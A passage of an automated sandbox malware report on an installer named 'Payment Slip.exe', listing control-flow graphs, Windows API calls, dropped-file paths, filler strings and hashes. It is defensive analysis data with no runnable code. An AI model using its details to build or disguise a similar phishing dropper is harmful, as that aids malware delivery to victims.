223->224 225 403b22-403b45 DialogBoxParamW call 40140b 224->225 226 403b0c-403b1c GetClassInfoW RegisterClassW 224->226 231 403b4a-403b53 call 403802 225->231 226->225 229 403b77-403b79 call 40140b 227->229 230 403b5f-403b65 227->230 229->201 230->211 232 403b6b-403b72 call 40140b 230->232 231->203 232->211
                                              APIs
                                                • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                              • lstrcatW.KERNEL32(1033,004226D0), ref: 00403933
                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes), ref: 00403A1A
                                                • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                              • RegisterClassW.USER32(00428180), ref: 00403A57
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                                              • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                                              • RegisterClassW.USER32(00428180), ref: 00403B1C
                                              • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\Payment Slip.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                              • API String ID: 914957316-626271727
                                              • Opcode ID: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
                                              • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                                              • Opcode Fuzzy Hash: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
                                              • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 238 403c55-403c67 239 403da8-403db7 238->239 240 403c6d-403c73 238->240 242 403e06-403e1b 239->242 243 403db9-403e01 GetDlgItem * 2 call 40412d SetClassLongW call 40140b 239->243 240->239 241 403c79-403c82 240->241 244 403c84-403c91 SetWindowPos 241->244 245 403c97-403c9a 241->245 247 403e5b-403e60 call 404179 242->247 248 403e1d-403e20 242->248 243->242 244->245 250 403cb4-403cba 245->250 251 403c9c-403cae ShowWindow 245->251 256 403e65-403e80 247->256 253 403e22-403e2d call 401389 248->253 254 403e53-403e55 248->254 257 403cd6-403cd9 250->257 258 403cbc-403cd1 DestroyWindow 250->258 251->250 253->254 269 403e2f-403e4e SendMessageW 253->269 254->247 255 4040fa 254->255 263 4040fc-404103 255->263 261 403e82-403e84 call 40140b 256->261 262 403e89-403e8f 256->262 266 403cdb-403ce7 SetWindowLongW 257->266 267 403cec-403cf2 257->267 264 4040d7-4040dd 258->264 261->262 272 403e95-403ea0 262->272 273 4040b8-4040d1 DestroyWindow EndDialog 262->273 264->255 270 4040df-4040e5 264->270 266->263 274 403d95-403da3 call 404194 267->274 275 403cf8-403d09 GetDlgItem 267->275 269->263 270->255 277 4040e7-4040f0 ShowWindow 270->277 272->273 278 403ea6-403ef3 call 405f0a call 40412d * 3 GetDlgItem 272->278 273->264 274->263 279 403d28-403d2b 275->279 280 403d0b-403d22 SendMessageW IsWindowEnabled 275->280 277->255 308 403ef5-403efa 278->308 309 403efd-403f39 ShowWindow KiUserCallbackDispatcher call 40414f EnableWindow 278->309 281 403d30-403d33 279->281 282 403d2d-403d2e 279->282 280->255 280->279 286 403d41-403d46 281->286 287 403d35-403d3b 281->287 285 403d5e-403d63 call 404106 282->285 285->274 289 403d7c-403d8f SendMessageW 286->289 291 403d48-403d4e 286->291 287->289 290 403d3d-403d3f 287->290 289->274 290->285 294 403d50-403d56 call 40140b 291->294 295 403d65-403d6e call 40140b 291->295 306 403d5c 294->306 295->274 304 403d70-403d7a 295->304 304->306 306->285 308->309 312 403f3b-403f3c 309->312 313 403f3e 309->313 314 403f40-403f6e GetSystemMenu EnableMenuItem SendMessageW 312->314 313->314 315 403f70-403f81 SendMessageW 314->315 316 403f83 314->316 317 403f89-403fc7 call 404162 call 405ee8 lstrlenW call 405f0a SetWindowTextW call 401389 315->317 316->317 317->256 326 403fcd-403fcf 317->326 326->256 327 403fd5-403fd9 326->327 328 403ff8-40400c DestroyWindow 327->328 329 403fdb-403fe1 327->329 328->264 331 404012-40403f CreateDialogParamW 328->331 329->255 330 403fe7-403fed 329->330 330->256 332 403ff3 330->332 331->264 333 404045-40409c call 40412d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 331->333 332->255 333->255 338 40409e-4040b1 ShowWindow call 404179 333->338 340 4040b6 338->340 340->264
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                                              • ShowWindow.USER32(?), ref: 00403CAE
                                              • DestroyWindow.USER32 ref: 00403CC2
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                                              • GetDlgItem.USER32(?,?), ref: 00403CFF
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                                              • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                                              • GetDlgItem.USER32(?,00000001), ref: 00403DC8
                                              • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
                                              • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                                              • ShowWindow.USER32(00000000,?), ref: 00403F04
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
                                              • EnableWindow.USER32(?,?), ref: 00403F31
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
                                              • EnableMenuItem.USER32(00000000), ref: 00403F4E
                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                                              • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                                              • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                                              • ShowWindow.USER32(?,0000000A), ref: 004040EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID:
                                              • API String ID: 3282139019-0
                                              • Opcode ID: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
                                              • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                                              • Opcode Fuzzy Hash: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
                                              • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 341 402dba-402e08 GetTickCount GetModuleFileNameW call 405b54 344 402e14-402e42 call 405ee8 call 40597f call 405ee8 GetFileSize 341->344 345 402e0a-402e0f 341->345 353 402f32-402f40 call 402d18 344->353 354 402e48-402e5f 344->354 346 403059-40305d 345->346 361 403011-403016 353->361 362 402f46-402f49 353->362 356 402e61 354->356 357 402e63-402e70 call 4032f7 354->357 356->357 363 402e76-402e7c 357->363 364 402fcd-402fd5 call 402d18 357->364 361->346 365 402f75-402fc1 GlobalAlloc call 40636e call 405b83 CreateFileW 362->365 366 402f4b-402f63 call 40330d call 4032f7 362->366 367 402efc-402f00 363->367 368 402e7e-402e96 call 405b0f 363->368 364->361 392 402fc3-402fc8 365->392 393 402fd7-403007 call 40330d call 403060 365->393 366->361 389 402f69-402f6f 366->389 372 402f02-402f08 call 402d18 367->372 373 402f09-402f0f 367->373 368->373 387 402e98-402e9f 368->387 372->373 379 402f11-402f1f call 406300 373->379 380 402f22-402f2c 373->380 379->380 380->353 380->354 387->373 391 402ea1-402ea8 387->391 389->361 389->365 391->373 394 402eaa-402eb1 391->394 392->346 401 40300c-40300f 393->401 394->373 396 402eb3-402eba 394->396 396->373 398 402ebc-402edc 396->398 398->361 400 402ee2-402ee6 398->400 403 402ee8-402eec 400->403 404 402eee-402ef6 400->404 401->361 402 403018-403029 401->402 405 403031-403036 402->405 406 40302b 402->406 403->353 403->404 404->373 407 402ef8-402efa 404->407 408 403037-40303d 405->408 406->405 407->373 408->408 409 40303f-403057 call 405b0f 408->409 409->346
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402DCE
                                              • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA
                                                • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402E33
                                              • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
                                              Strings
                                              • Error launching installer, xrefs: 00402E0A
                                              • Null, xrefs: 00402EB3
                                              • Inst, xrefs: 00402EA1
                                              • "C:\Users\user\Desktop\Payment Slip.exe", xrefs: 00402DC3
                                              • soft, xrefs: 00402EAA
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
                                              • C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\Payment Slip.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 2803837635-1644656755
                                              • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                              • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                                              • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                              • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 538 401752-401777 call 402b38 call 4059aa 543 401781-401793 call 405ee8 call 405933 lstrcatW 538->543 544 401779-40177f call 405ee8 538->544 549 401798-401799 call 40617c 543->549 544->549 553 40179e-4017a2 549->553 554 4017a4-4017ae call 40622b 553->554 555 4017d5-4017d8 553->555 562 4017c0-4017d2 554->562 563 4017b0-4017be CompareFileTime 554->563 556 4017e0-4017fc call 405b54 555->556 557 4017da-4017db call 405b2f 555->557 565 401870-401899 call 405192 call 403060 556->565 566 4017fe-401801 556->566 557->556 562->555 563->562 578 4018a1-4018ad SetFileTime 565->578 579 40189b-40189f 565->579 567 401852-40185c call 405192 566->567 568 401803-401841 call 405ee8 * 2 call 405f0a call 405ee8 call 4056c4 566->568 580 401865-40186b 567->580 568->553 600 401847-401848 568->600 582 4018b3-4018be FindCloseChangeNotification 578->582 579->578 579->582 583 4029ce 580->583 585 4018c4-4018c7 582->585 586 4029c5-4029c8 582->586 587 4029d0-4029d4 583->587 590 4018c9-4018da call 405f0a lstrcatW 585->590 591 4018dc-4018df call 405f0a 585->591 586->583 597 4018e4-402241 call 4056c4 590->597 591->597 597->586 597->587 600->580 602 40184a-40184b 600->602 602->567
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                                              • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac","C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",00000000,00000000,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,?,?,00000031), ref: 004017B8
                                                • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: "C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac"$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
                                              • API String ID: 1941528284-4085916267
                                              • Opcode ID: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
                                              • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                                              • Opcode Fuzzy Hash: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
                                              • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 604 405192-4051a7 605 4051ad-4051be 604->605 606 40525e-405262 604->606 607 4051c0-4051c4 call 405f0a 605->607 608 4051c9-4051d5 lstrlenW 605->608 607->608 610 4051f2-4051f6 608->610 611 4051d7-4051e7 lstrlenW 608->611 613 405205-405209 610->613 614 4051f8-4051ff SetWindowTextW 610->614 611->606 612 4051e9-4051ed lstrcatW 611->612 612->610 615 40520b-40524d SendMessageW * 3 613->615 616 40524f-405251 613->616 614->613 615->616 616->606 617 405253-405256 616->617 617->606
                                              APIs
                                              • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                              • lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                              • lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                              • SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID: Completed
                                              • API String ID: 2531174081-3087654605
                                              • Opcode ID: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
                                              • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                                              • Opcode Fuzzy Hash: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
                                              • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 618 40317b-4031a4 GetTickCount 619 4032e5-4032ed call 402d18 618->619 620 4031aa-4031d5 call 40330d SetFilePointer 618->620 625 4032ef-4032f4 619->625 626 4031da-4031ec 620->626 627 4031f0-4031fe call 4032f7 626->627 628 4031ee 626->628 631 403204-403210 627->631 632 4032d7-4032da 627->632 628->627 633 403216-40321c 631->633 632->625 634 403247-403263 call 40638e 633->634 635 40321e-403224 633->635 640 4032e0 634->640 641 403265-40326d 634->641 635->634 637 403226-403246 call 402d18 635->637 637->634 645 4032e2-4032e3 640->645 643 4032a1-4032a7 641->643 644 40326f-403285 WriteFile 641->644 643->640 648 4032a9-4032ab 643->648 646 403287-40328b 644->646 647 4032dc-4032de 644->647 645->625 646->647 649 40328d-403299 646->649 647->645 648->640 650 4032ad-4032c0 648->650 649->633 651 40329f 649->651 650->626 652 4032c6-4032d5 SetFilePointer 650->652 651->650 652->619
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00403190
                                                • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                                              • WriteFile.KERNELBASE(0040BE78,00410F02,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                                              • SetFilePointer.KERNELBASE(00139715,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                                              Strings
                                              • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004031F0, 004031F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: File$Pointer$CountTickWrite
                                              • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                              • API String ID: 2146148272-2559241417
                                              • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                              • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                                              • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                              • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
